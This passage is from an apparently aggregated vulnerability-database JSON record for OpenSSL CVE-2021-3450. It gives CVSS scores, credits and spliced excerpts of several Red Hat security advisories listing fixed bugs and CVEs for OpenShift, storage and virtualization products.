"version": "19.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "162699"
},
{
"db": "PACKETSTORM",
"id": "163209"
},
{
"db": "PACKETSTORM",
"id": "163257"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162151"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
],
"trust": 1.4
},
"cve": "CVE-2021-3450",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2021-3450",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-388430",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2021-3450",
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-3450",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202103-1456",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-388430",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"description": {
"_id": null,
"data": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a \"purpose\" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named \"purpose\" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j). OpenSSL is an open source general encryption library of the Openssl team that can implement the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLSv1) protocols. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. \n\nThis issue was reported to OpenSSL on 18th March 2021 by Benjamin Kaduk\nfrom Akamai and was discovered by Xiang Ding and others at Akamai. The fix was\ndeveloped by Tom\u00e1\u0161 Mr\u00e1z. \n\n\nNULL pointer deref in signature_algorithms processing (CVE-2021-3449)\n=====================================================================\n\nSeverity: High\n\nAn OpenSSL TLS server may crash if sent a maliciously crafted renegotiation\nClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits\nthe signature_algorithms extension (where it was present in the initial\nClientHello), but includes a signature_algorithms_cert extension then a NULL\npointer dereference will result, leading to a crash and a denial of service\nattack. \n\nA server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which\nis the default configuration). \n\nThis issue was reported to OpenSSL on 17th March 2021 by Nokia. The fix was\ndeveloped by Peter K\u00e4stle and Samuel Sapalski from Nokia. \n\nNote\n====\n\nOpenSSL 1.0.2 is out of support and no longer receiving public updates. Extended\nsupport is available for premium support customers:\nhttps://www.openssl.org/support/contracts.html\n\nOpenSSL 1.1.0 is out of support and no longer receiving updates of any kind. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20210325.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n. \n\nBug Fix(es):\n\nThis update includes various bug fixes and enhancements. Bugs fixed (https://bugzilla.redhat.com/):\n\n1803849 - [RFE] Include per volume encryption with Vault integration in RHCS 4.1\n1814681 - [RFE] use topologySpreadConstraints to evenly spread OSDs across hosts\n1840004 - CVE-2020-7608 nodejs-yargs-parser: prototype pollution vulnerability\n1850089 - OBC CRD is outdated and leads to missing columns in get queries\n1860594 - Toolbox pod should have toleration for OCS tainted nodes\n1861104 - OCS podDisruptionBudget prevents successful OCP upgrades\n1861878 - [RFE] use appropriate PDB values for OSD\n1866301 - [RHOCS Usability Study][Installation] \u201cCreate storage cluster\u201d should be a part of the installation flow or need to be emphasized as a crucial step. \n1915261 - Deleted MCG CRs are stuck in a \u0027Deleting\u0027 state\n1915445 - Uninstall 4.7: Storagecluster deletion stuck on a partially created KMS enabled OCS cluster + support TLS configuration for KMS\n1915644 - update noobaa db label in must-gather to collect db pod in noobaa dir\n1915698 - There is missing noobaa-core-0 pod after upgrade from OCS 4.6 to OCS 4.7\n1915706 - [Azure][RBD] PV taking longer time ~ 9 minutes to get deleted\n1915730 - [ocs-operator] Create public route for ceph-rgw service\n1915737 - Improve ocs-operator logging during uninstall to be more verbose, to understand reasons for failures - e.g. In addition to persistent storage, Red Hat\nOpenShift Container Storage provisions a multicloud data management service\nwith an S3 compatible API. \n\nSecurity Fix(es):\n\n* NooBaa: noobaa-operator leaking RPC AuthToken into log files\n(CVE-2021-3528)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nBug Fix(es):\n\n* Currently, a newly restored PVC cannot be mounted if some of the\nOpenShift Container Platform nodes are running on a version of Red Hat\nEnterprise Linux which is less than 8.2, and the snapshot from which the\nPVC was restored is deleted. \nWorkaround: Do not delete the snapshot from which the PVC was restored\nuntil the restored PVC is deleted. (BZ#1962483)\n\n* Previously, the default backingstore was not created on AWS S3 when\nOpenShift Container Storage was deployed, due to incorrect identification\nof AWS S3. With this update, the default backingstore gets created when\nOpenShift Container Storage is deployed on AWS S3. (BZ#1927307)\n\n* Previously, log messages were printed to the endpoint pod log even if the\ndebug option was not set. With this update, the log messages are printed to\nthe endpoint pod log only when the debug option is set. (BZ#1938106)\n\n* Previously, the PVCs could not be provisioned as the `rook-ceph-mds` did\nnot register the pod IP on the monitor servers, and hence every mount on\nthe filesystem timed out, resulting in CephFS volume provisioning failure. \nWith this update, an argument `--public-addr=podIP` is added to the MDS pod\nwhen the host network is not enabled, and hence the CephFS volume\nprovisioning does not fail. (BZ#1949558)\n\n* Previously, OpenShift Container Storage 4.2 clusters were not updated\nwith the correct cache value, and hence MDSs in standby-replay might report\nan oversized cache, as rook did not apply the `mds_cache_memory_limit`\nargument during upgrades. With this update, the `mds_cache_memory_limit`\nargument is applied during upgrades and the mds daemon operates normally. \n(BZ#1951348)\n\n* Previously, the coredumps were not generated in the correct location as\nrook was setting the config option `log_file` to an empty string since\nlogging happened on stdout and not on the files, and hence Ceph read the\nvalue of the `log_file` to build the dump path. With this update, rook does\nnot set the `log_file` and keeps Ceph\u0027s internal default, and hence the\ncoredumps are generated in the correct location and are accessible under\n`/var/log/ceph/`. (BZ#1938049)\n\n* Previously, Ceph became inaccessible, as the mons lose quorum if a mon\npod was drained while another mon was failing over. With this update,\nvoluntary mon drains are prevented while a mon is failing over, and hence\nCeph does not become inaccessible. (BZ#1946573)\n\n* Previously, the mon quorum was at risk, as the operator could erroneously\nremove the new mon if the operator was restarted during a mon failover. \nWith this update, the operator completes the same mon failover after the\noperator is restarted, and hence the mon quorum is more reliable in the\nnode drains and mon failover scenarios. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1938106 - [GSS][RFE]Reduce debug level for logs of Nooba Endpoint pod\n1950915 - XSS Vulnerability with Noobaa version 5.5.0-3bacc6b\n1951348 - [GSS][CephFS] health warning \"MDS cache is too large (3GB/1GB); 0 inodes in use by clients, 0 stray files\" for the standby-replay\n1951600 - [4.6.z][Clone of BZ #1936545] setuid and setgid file bits are not retained after a OCS CephFS CSI restore\n1955601 - CVE-2021-3528 NooBaa: noobaa-operator leaking RPC AuthToken into log files\n1957189 - [Rebase] Use RHCS4.2z1 container image with OCS 4..6.5[may require doc update for external mode min supported RHCS version]\n1959980 - When a node is being drained, increase the mon failover timeout to prevent unnecessary mon failover\n1959983 - [GSS][mon] rook-operator scales mons to 4 after healthCheck timeout\n1962483 - [RHEL7][RBD][4.6.z clone] FailedMount error when using restored PVC on app pod\n\n5. \n\nBug Fix(es):\n\n* WMCO patch pub-key-hash annotation to Linux node (BZ#1945248)\n\n* LoadBalancer Service type with invalid external loadbalancer IP breaks\nthe datapath (BZ#1952917)\n\n* Telemetry info not completely available to identify windows nodes\n(BZ#1955319)\n\n* WMCO incorrectly shows node as ready after a failed configuration\n(BZ#1956412)\n\n* kube-proxy service terminated unexpectedly after recreated LB service\n(BZ#1963263)\n\n3. Solution:\n\nFor Windows Machine Config Operator upgrades, see the following\ndocumentation:\n\nhttps://docs.openshift.com/container-platform/4.7/windows_containers/window\ns-node-upgrades.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1945248 - WMCO patch pub-key-hash annotation to Linux node\n1946538 - CVE-2021-25736 kubernetes: LoadBalancer Service type don\u0027t create a HNS policy for empty or invalid external loadbalancer IP, what could lead to MITM\n1952917 - LoadBalancer Service type with invalid external loadbalancer IP breaks the datapath\n1955319 - Telemetry info not completely available to identify windows nodes\n1956412 - WMCO incorrectly shows node as ready after a failed configuration\n1963263 - kube-proxy service terminated unexpectedly after recreated LB service\n\n5. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. These\npackages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nChanges to the redhat-release-virtualization-host component:\n\n* Previously, the redhat-support-tool was missing from the RHV-H 4.4\npackage. \nIn this release, the redhat-support-tool has been added. For the update\nto take effect, all services linked to the glibc library must be restarted,\nor the system rebooted. Bugs fixed (https://bugzilla.redhat.com/):\n\n1892573 - RHVH 4.4.2 fails to boot from SAN when using UUID for /boot partition\n1895832 - RHVH 4.4.3: No response when clicking button \"Help\" in Anaconda GUI\n1907306 - \"sysstat\" doesn\u0027t collect data for upgraded RHVH\n1907358 - In FIPS mode, RHVH cannot enter the new layer after upgrade\n1907746 - RHVH cannot enter the new layer after upgrade testing with STIG profile selected. \n1918207 - RHVH upgrade to 4.4.5-1 will fail due to FileNotFoundError\n1927395 - RHVH, protecting key packages from being removed. \n1928607 - redhat-support-tool is missing from latest RHV-H 4.4\n1940845 - Include updated gluster-ansible-features in RHV-H 4.4.5\n1941547 - CVE-2021-3450 openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT\n1941554 - CVE-2021-3449 openssl: NULL pointer dereference in signature_algorithms processing\n1942040 - Rebase RHV-H 4.4.5 on RHEL-AV 8.3.1 Async\n1942498 - Rebase RHV-H 4.4.5 on RHEL-8.3.1.3\n\n6. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.2.2 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nBug Fix(es):\n\n* Documentation is referencing deprecated API for Service Export -\nSubmariner (BZ#1936528)\n\n* Importing of cluster fails due to error/typo in generated command\n(BZ#1936642)\n\n* RHACM 2.2.2 images (BZ#1938215)\n\n* 2.2 clusterlifecycle fails to allow provision `fips: true` clusters on\naws, vsphere (BZ#1941778)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension\n1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag\n1914238 - CVE-2020-29529 go-slug: partial protection against zip slip attacks\n1928937 - CVE-2021-23337 nodejs-lodash: command injection via template\n1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n1930310 - CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n1930324 - CVE-2021-23840 openssl: integer overflow in CipherUpdate\n1936528 - Documentation is referencing deprecated API for Service Export - Submariner\n1936642 - Importing of cluster fails due to error/typo in generated command\n1938215 - RHACM 2.2.2 images\n1941778 - 2.2 clusterlifecycle fails to allow provision `fips: true` clusters on aws, vsphere\n1942178 - CVE-2021-21321 fastify-reply-from: crafted URL allows prefix scape of the proxied backend service\n1942182 - CVE-2021-21322 fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: OpenShift Container Platform 4.10.3 security update\nAdvisory ID: RHSA-2022:0056-01\nProduct: Red Hat OpenShift Enterprise\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:0056\nIssue date: 2022-03-10\nCVE Names: CVE-2014-3577 CVE-2016-10228 CVE-2017-14502 \n CVE-2018-20843 CVE-2018-1000858 CVE-2019-8625 \n CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 \n CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 \n CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 \n CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 \n CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 \n CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 \n CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 \n CVE-2019-8846 CVE-2019-9169 CVE-2019-13050 \n CVE-2019-13627 CVE-2019-14889 CVE-2019-15903 \n CVE-2019-19906 CVE-2019-20454 CVE-2019-20807 \n CVE-2019-25013 CVE-2020-1730 CVE-2020-3862 \n CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 \n CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 \n CVE-2020-3895 CVE-2020-3897 CVE-2020-3899 \n CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 \n CVE-2020-8927 CVE-2020-9802 CVE-2020-9803 \n CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 \n CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 \n CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 \n CVE-2020-9915 CVE-2020-9925 CVE-2020-9952 \n CVE-2020-10018 CVE-2020-11793 CVE-2020-13434 \n CVE-2020-14391 CVE-2020-15358 CVE-2020-15503 \n CVE-2020-25660 CVE-2020-25677 CVE-2020-27618 \n CVE-2020-27781 CVE-2020-29361 CVE-2020-29362 \n CVE-2020-29363 CVE-2021-3121 CVE-2021-3326 \n CVE-2021-3449 CVE-2021-3450 CVE-2021-3516 \n CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 \n CVE-2021-3521 CVE-2021-3537 CVE-2021-3541 \n CVE-2021-3733 CVE-2021-3749 CVE-2021-20305 \n CVE-2021-21684 CVE-2021-22946 CVE-2021-22947 \n CVE-2021-25215 CVE-2021-27218 CVE-2021-30666 \n CVE-2021-30761 CVE-2021-30762 CVE-2021-33928 \n CVE-2021-33929 CVE-2021-33930 CVE-2021-33938 \n CVE-2021-36222 CVE-2021-37750 CVE-2021-39226 \n CVE-2021-41190 CVE-2021-43813 CVE-2021-44716 \n CVE-2021-44717 CVE-2022-0532 CVE-2022-21673 \n CVE-2022-24407 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.10.3 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.10.3. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2022:0055\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nSecurity Fix(es):\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n* grafana: Snapshot authentication bypass (CVE-2021-39226)\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n* nodejs-axios: Regular expression denial of service in trim function\n(CVE-2021-3749)\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n* grafana: Forward OAuth Identity Token can allow users to access some data\nsources (CVE-2022-21673)\n* grafana: directory traversal vulnerability (CVE-2021-43813)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-x86_64\n\nThe image digest is\nsha256:7ffe4cd612be27e355a640e5eec5cd8f923c1400d969fd590f806cffdaabcc56\n\n(For s390x architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-s390x\n\nThe image digest is\nsha256:4cf21a9399da1ce8427246f251ae5dedacfc8c746d2345f9cfe039ed9eda3e69\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-ppc64le\n\nThe image digest is\nsha256:4ee571da1edf59dfee4473aa4604aba63c224bf8e6bcf57d048305babbbde93c\n\nAll OpenShift Container Platform 4.10 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.10 see the following documentation,\nwhich will be updated shortly for this release, for moderate instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1808240 - Always return metrics value for pods under the user\u0027s namespace\n1815189 - feature flagged UI does not always become available after operator installation\n1825034 - e2e: Mock CSI tests fail on IBM ROKS clusters\n1826225 - edge terminated h2 (gRPC) connections need a haproxy template change to work correctly\n1860774 - csr for vSphere egress nodes were not approved automatically during cert renewal\n1878106 - token inactivity timeout is not shortened after oauthclient/oauth config values are lowered\n1878925 - \u0027oc adm upgrade --to ...\u0027 rejects versions which occur only in history, while the cluster-version operator supports history fallback\n1880738 - origin e2e test deletes original worker\n1882983 - oVirt csi driver should refuse to provision RWX and ROX PV\n1886450 - Keepalived router id check not documented for RHV/VMware IPI\n1889488 - The metrics endpoint for the Scheduler is not protected by RBAC\n1894431 - Router pods fail to boot if the SSL certificate applied is missing an empty line at the bottom\n1896474 - Path based routing is broken for some combinations\n1897431 - CIDR support for additional network attachment with the bridge CNI plug-in\n1903408 - NodePort externalTrafficPolicy does not work for ovn-kubernetes\n1907433 - Excessive logging in image operator\n1909906 - The router fails with PANIC error when stats port already in use\n1911173 - [MSTR-998] Many charts\u0027 legend names show {{}} instead of words\n1914053 - pods assigned with Multus whereabouts IP get stuck in ContainerCreating state after node rebooting. \n1916169 - a reboot while MCO is applying changes leaves the node in undesirable state and MCP looks fine (UPDATED=true)\n1917893 - [ovirt] install fails: due to terraform error \"Cannot attach Virtual Disk: Disk is locked\" on vm resource\n1921627 - GCP UPI installation failed due to exceeding gcp limitation of instance group name\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1926522 - oc adm catalog does not clean temporary files\n1927478 - Default CatalogSources deployed by marketplace do not have toleration for tainted nodes. \n1928141 - kube-storage-version-migrator constantly reporting type \"Upgradeable\" status Unknown\n1928285 - [LSO][OCS][arbiter] OCP Console shows no results while in fact underlying setup of LSO localvolumeset and it\u0027s storageclass is not yet finished, confusing users\n1931594 - [sig-cli] oc --request-timeout works as expected fails frequently on s390x\n1933847 - Prometheus goes unavailable (both instances down) during 4.8 upgrade\n1937085 - RHV UPI inventory playbook missing guarantee_memory\n1937196 - [aws ebs csi driver] events for block volume expansion may cause confusion\n1938236 - vsphere-problem-detector does not support overriding log levels via storage CR\n1939401 - missed labels for CMO/openshift-state-metric/telemeter-client/thanos-querier pods\n1939435 - Setting an IPv6 address in noProxy field causes error in openshift installer\n1939552 - [sig-api-machinery] CustomResourcePublishOpenAPI [Privileged:ClusterAdmin] works for CRD preserving unknown fields in an embedded object [Conformance] [Suite:openshift/conformance/parallel/minimal] [Suite:k8s]\n1942913 - ThanosSidecarUnhealthy isn\u0027t resilient to WAL replays. \n1943363 - [ovn] CNO should gracefully terminate ovn-northd\n1945274 - ostree-finalize-staged.service failed while upgrading a rhcos node to 4.6.17\n1948080 - authentication should not set Available=False APIServices_Error with 503s\n1949262 - Prometheus Statefulsets should have 2 replicas and hard affinity set\n1949672 - [GCP] Update 4.8 UPI template to match ignition version: 3.2.0\n1950827 - [LSO] localvolumediscoveryresult name is not friendly to customer\n1952576 - csv_succeeded metric not present in olm-operator for all successful CSVs\n1953264 - \"remote error: tls: bad certificate\" logs in prometheus-operator container\n1955300 - Machine config operator reports unavailable for 23m during upgrade\n1955489 - Alertmanager Statefulsets should have 2 replicas and hard affinity set\n1955490 - Thanos ruler Statefulsets should have 2 replicas and hard affinity set\n1955544 - [IPI][OSP] densed master-only installation with 0 workers fails due to missing worker security group on masters\n1956496 - Needs SR-IOV Docs Upstream\n1956739 - Permission for authorized_keys for core user changes from core user to root when changed the pull secret\n1956776 - [vSphere] Installer should do pre-check to ensure user-provided network name is valid\n1956964 - upload a boot-source to OpenShift virtualization using the console\n1957547 - [RFE]VM name is not auto filled in dev console\n1958349 - ovn-controller doesn\u0027t release the memory after cluster-density run\n1959352 - [scale] failed to get pod annotation: timed out waiting for annotations\n1960378 - icsp allows mirroring of registry root - install-config imageContentSources does not\n1960674 - Broken test: [sig-imageregistry][Serial][Suite:openshift/registry/serial] Image signature workflow can push a signed image to openshift registry and verify it [Suite:openshift/conformance/serial]\n1961317 - storage ClusterOperator does not declare ClusterRoleBindings in relatedObjects\n1961391 - String updates\n1961509 - DHCP daemon pod should have CPU and memory requests set but not limits\n1962066 - Edit machine/machineset specs not working\n1962206 - openshift-multus/dhcp-daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent\n1963053 - `oc whoami --show-console` should show the web console URL, not the server api URL\n1964112 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters\n1964327 - Support containers with name:tag@digest\n1964789 - Send keys and disconnect does not work for VNC console\n1965368 - ClusterQuotaAdmission received non-meta object - message constantly reported in OpenShift Container Platform 4.7\n1966445 - Unmasking a service doesn\u0027t work if it masked using MCO\n1966477 - Use GA version in KAS/OAS/OauthAS to avoid: \"audit.k8s.io/v1beta1\" is deprecated and will be removed in a future release, use \"audit.k8s.io/v1\" instead\n1966521 - kube-proxy\u0027s userspace implementation consumes excessive CPU\n1968364 - [Azure] when using ssh type ed25519 bootstrap fails to come up\n1970021 - nmstate does not persist its configuration due to overlay systemd-connections-merged mount\n1970218 - MCO writes incorrect file contents if compression field is specified\n1970331 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install [Suite:openshift/conformance/parallel]\n1970805 - Cannot create build when docker image url contains dir structure\n1972033 - [azure] PV region node affinity is failure-domain.beta.kubernetes.io instead of topology.kubernetes.io\n1972827 - image registry does not remain available during upgrade\n1972962 - Should set the minimum value for the `--max-icsp-size` flag of `oc adm catalog mirror`\n1973447 - ovn-dbchecker peak memory spikes to ~500MiB during cluster-density run\n1975826 - ovn-kubernetes host directed traffic cannot be offloaded as CT zone 64000 is not established\n1976301 - [ci] e2e-azure-upi is permafailing\n1976399 - During the upgrade from OpenShift 4.5 to OpenShift 4.6 the election timers for the OVN north and south databases did not change. \n1976674 - CCO didn\u0027t set Upgradeable to False when cco mode is configured to Manual on azure platform\n1976894 - Unidling a StatefulSet does not work as expected\n1977319 - [Hive] Remove stale cruft installed by CVO in earlier releases\n1977414 - Build Config timed out waiting for condition 400: Bad Request\n1977929 - [RFE] Display Network Attachment Definitions from openshift-multus namespace during OCS deployment via UI using Multus\n1978528 - systemd-coredump started and failed intermittently for unknown reasons\n1978581 - machine-config-operator: remove runlevel from mco namespace\n1979562 - Cluster operators: don\u0027t show messages when neither progressing, degraded or unavailable\n1979962 - AWS SDN Network Stress tests have not passed in 4.9 release-openshift-origin-installer-e2e-aws-sdn-network-stress-4.9\n1979966 - OCP builds always fail when run on RHEL7 nodes\n1981396 - Deleting pool inside pool page the pool stays in Ready phase in the heading\n1981549 - Machine-config daemon does not recover from broken Proxy configuration\n1981867 - [sig-cli] oc explain should contain proper fields description for special types [Suite:openshift/conformance/parallel]\n1981941 - Terraform upgrade required in openshift-installer to resolve multiple issues\n1982063 - \u0027Control Plane\u0027 is not translated in Simplified Chinese language in Home-\u003eOverview page\n1982498 - Default registry credential path should be adjusted to use containers/auth.json for oc commands\n1982662 - Workloads - DaemonSets - Add storage: i18n misses\n1982726 - kube-apiserver audit logs show a lot of 404 errors for DELETE \"*/secrets/encryption-config\" on single node clusters\n1983758 - upgrades are failing on disruptive tests\n1983964 - Need Device plugin configuration for the NIC \"needVhostNet\" \u0026 \"isRdma\"\n1984592 - global pull secret not working in OCP4.7.4+ for additional private registries\n1985073 - new-in-4.8 ExtremelyHighIndividualControlPlaneCPU fires on some GCP update jobs\n1985486 - Cluster Proxy not used during installation on OSP with Kuryr\n1985724 - VM Details Page missing translations\n1985838 - [OVN] CNO exportNetworkFlows does not clear collectors when deleted\n1985933 - Downstream image registry recommendation\n1985965 - oVirt CSI driver does not report volume stats\n1986216 - [scale] SNO: Slow Pod recovery due to \"timed out waiting for OVS port binding\"\n1986237 - \"MachineNotYetDeleted\" in Pending state , alert not fired\n1986239 - crictl create fails with \"PID namespace requested, but sandbox infra container invalid\"\n1986302 - console continues to fetch prometheus alert and silences for normal user\n1986314 - Current MTV installation for KubeVirt import flow creates unusable Forklift UI\n1986338 - error creating list of resources in Import YAML\n1986502 - yaml multi file dnd duplicates previous dragged files\n1986819 - fix string typos for hot-plug disks\n1987044 - [OCPV48] Shutoff VM is being shown as \"Starting\" in WebUI when using spec.runStrategy Manual/RerunOnFailure\n1987136 - Declare operatorframework.io/arch.* labels for all operators\n1987257 - Go-http-client user-agent being used for oc adm mirror requests\n1987263 - fsSpaceFillingUpWarningThreshold not aligned to Kubernetes Garbage Collection Threshold\n1987445 - MetalLB integration: All gateway routers in the cluster answer ARP requests for LoadBalancer services IP\n1988406 - SSH key dropped when selecting \"Customize virtual machine\" in UI\n1988440 - Network operator changes ovnkube-config too early causing ovnkube-master pods to crashloop during cluster upgrade\n1988483 - Azure drop ICMP need to frag FRAG when using OVN: openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with \"Unable to connect to the server\"\n1988879 - Virtual media based deployment fails on Dell servers due to pending Lifecycle Controller jobs\n1989438 - expected replicas is wrong\n1989502 - Developer Catalog is disappearing after short time\n1989843 - \u0027More\u0027 and \u0027Show Less\u0027 functions are not translated on several page\n1990014 - oc debug \u003cpod-name\u003e does not work for Windows pods\n1990190 - e2e testing failed with basic manifest: reason/ExternalProvisioning waiting for a volume to be created\n1990193 - \u0027more\u0027 and \u0027Show Less\u0027 is not being translated on 